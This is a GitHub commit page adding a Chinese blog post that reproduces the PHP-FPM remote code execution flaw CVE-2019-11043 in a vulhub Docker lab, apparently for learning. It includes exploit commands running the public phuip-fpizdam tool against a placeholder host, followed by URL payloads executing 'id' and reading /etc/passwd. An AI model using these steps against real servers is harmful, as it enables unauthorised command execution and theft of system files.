generated from cotes2020/chirpy-starter
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
30bf52c
commit 004df09
Showing
3 changed files
with
55 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
--- | ||
title: 漏洞复现-PHP-FPM 远程代码执行漏洞 | ||
description: CVE-2019-11043 从一个小的内存溢出到代码执行 | ||
author: #有默认值 | ||
date: 2024-09-10 10:13:14 +0800 | ||
categories: [漏洞复现] | ||
tags: [漏洞复现,RCE] # TAG names should always be lowercase | ||
pin: # 默认false,可填true | ||
math: true | ||
mermaid: true | ||
# image: | ||
# path: /assets/bar/home.png | ||
# lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA | ||
# alt: # 图片名 | ||
--- | ||
|
||
## 构建 | ||
|
||
``` shell | ||
cd vulhub/php/CVE-2019-11043 | ||
docker-compose up -d | ||
``` | ||
cd | ||
## 漏洞原理 | ||
https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md | ||
|
||
https://blog.orange.tw/posts/2019-10-an-analysis-and-thought-about-recently/ | ||
|
||
https://cloud.tencent.com/developer/article/1530703 | ||
|
||
这是一个非常有趣的漏洞!从一个小的内存缺陷到代码执行。它结合了二进制和网络技术, | ||
|
||
## PoC(Proof of Concept) 验证漏洞存在的代码 | ||
作者利用了双缓冲机制,如果缓冲区到达末尾(pos > end),PHP-FPM 会创建一个新的缓冲区,并将前一个缓冲区放入结构成员 fcgi_data_seg->next 中。 | ||
若有 PHPINFO 页面。获取/info.php/%0a.php ,观察 $_SERVER['PATH_INFO'] 是否损坏! | ||
... | ||
影响版本:PHP 5.6-7.x,Nginx>=0.7.31 | ||
## Exp(Exploit)进行实际的攻击利用 | ||
安装漏洞利用工具,和利用 | ||
```shell | ||
git clone https://github.com/neex/phuip-fpizdam.git | ||
cd phuip-fpizdam | ||
go run . "http://your-ip:8080/index.php" | ||
``` | ||
![](../assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png) | ||
访问http://your-ip:8080/index.php?a=id,即可查看到id命令已成功执行 | ||
![](../assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png) | ||
注意:只有部分PHP-FPM子进程受到了污染,因此请尝试几次以执行RCE命令,会出现成功执行 | ||
```shell | ||
/index.php?a=cat /etc/passwd | ||
``` | ||
|
||
|
||
## 复现总结 | ||
无法直接通过url传入反弹shell命令,执行失败 |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.